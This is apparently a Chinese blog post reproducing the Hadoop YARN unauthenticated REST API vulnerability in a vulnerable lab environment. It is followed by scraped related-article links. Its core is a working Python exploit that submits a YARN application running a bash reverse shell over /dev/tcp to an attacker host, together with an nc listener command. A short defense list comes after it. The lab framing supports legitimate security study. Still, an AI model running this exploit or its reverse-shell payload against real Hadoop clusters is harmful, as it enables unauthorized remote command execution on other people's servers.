Hadoop未授权访问漏洞
漏洞简介以及危害
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了
Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下
的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。
环境
vulnhub
测试
启动环境
docker-compose up -d
访问
http://192.168.0.100:8088/cluster
通过REST API命令执行
利用过程:
在本地监听端口 > 创建Application > 调用Submit Application API提交
1.本机监听
nc -lvvp 8888
2.直接本机执行EXP:python exp.py
import requests
target = 'http://192.168.0.100:8088/'
lhost = '192.168.0.105' # put your local host ip here, and listen at port 8888
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,
'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
3.反弹shell成功
防御手段
- 如无必要, 关闭 Hadoop Web 管理⻚面。
- 开启身份验证 ,防止未经授权用户访问。
- 设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访包括 50070 以及 WebUI 等相关端口。
Hadoop未授权访问漏洞相关推荐
- Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)
漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以 ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
- 未授权访问漏洞-Redis未授权访问漏洞
文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- Hadoophbase监控页面未授权访问漏洞处理方案验证过程实现
Hadoop&hbase监控页面未授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http ...
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- 【应急类漏洞】————1、未授权访问漏洞总结
前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪.根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植 ...
- 常用的30+种未授权访问漏洞汇总
未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...
- 常用的端口及未授权访问漏洞
一.介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞.OpenSSL漏洞 25 SMTP协议 53 ...
最新文章
- python 怎样使list 里面的数据相加
- 20个经典要诀学好英语
- JavaScript定义函数的几种方式
- IOS基础:声音调用
- 笔记-组织级项目管理与大型项目管理-大型及复杂项目
- python分片操作_【python原理解析】python中分片的实现原理及使用技巧
- 理解水平扩展和垂直扩展
- oracle对查询结果求和_Oracle 闪回技术详解
- android源码解析------Media多媒体framework层分析
- vip forum.php,DZ论坛突破VIP回复查看内容
- SHA256算法可逆吗,SHA256算法流程步骤
- CefSharp 实现拖拉滑动验证Demo
- 遇见心想事成的自己……
- URAL 1742 Team building 强联通
- 北京市金融工作局:大数据重塑未来金融监管方式
- 五阶魔方公式java_五阶魔方花样有多漂亮,关键是有点难
- python协同过滤可以预测吗_基于用户的协同过滤推荐算法原理-附python代码实现...
- Java 仿 Excel 公式计算
- 211毕业生3天被辞退:offer不等于工作稳了!
- PCL中利用KD-Tree搜索空间点云最临近点源码
热门文章
- Ubuntu history命令 查看 terminal 曾经执行过的命令
- 基金从业考试能用计算机吗,【基金从业资格考试机考注意事项】- 环球网校
- 《数据挖掘(完整版)》笔记——基于规则的分类器
- harmonyos系统支持哪些手机,华为发布了适用于部分手机的HarmonyOS 2.0 beta
- 东北大学计算机组成原理实验四,东北大学计算机组成原理实验报告(12页)-原创力文档...
- SpringBoot项目报错解决:“Error starting ApplicationContext. To display the conditions report re-run ...”
- OurPHP傲派(企业 商城 小程序)建站系统 v2.1.0 bulid20200628
- 【iOS】简单的界面制作
- [RK3288][Android6.0] WiFi之NetworkAgent对评分的更新
- 可扩展性对英特尔®至强处理器意味着什么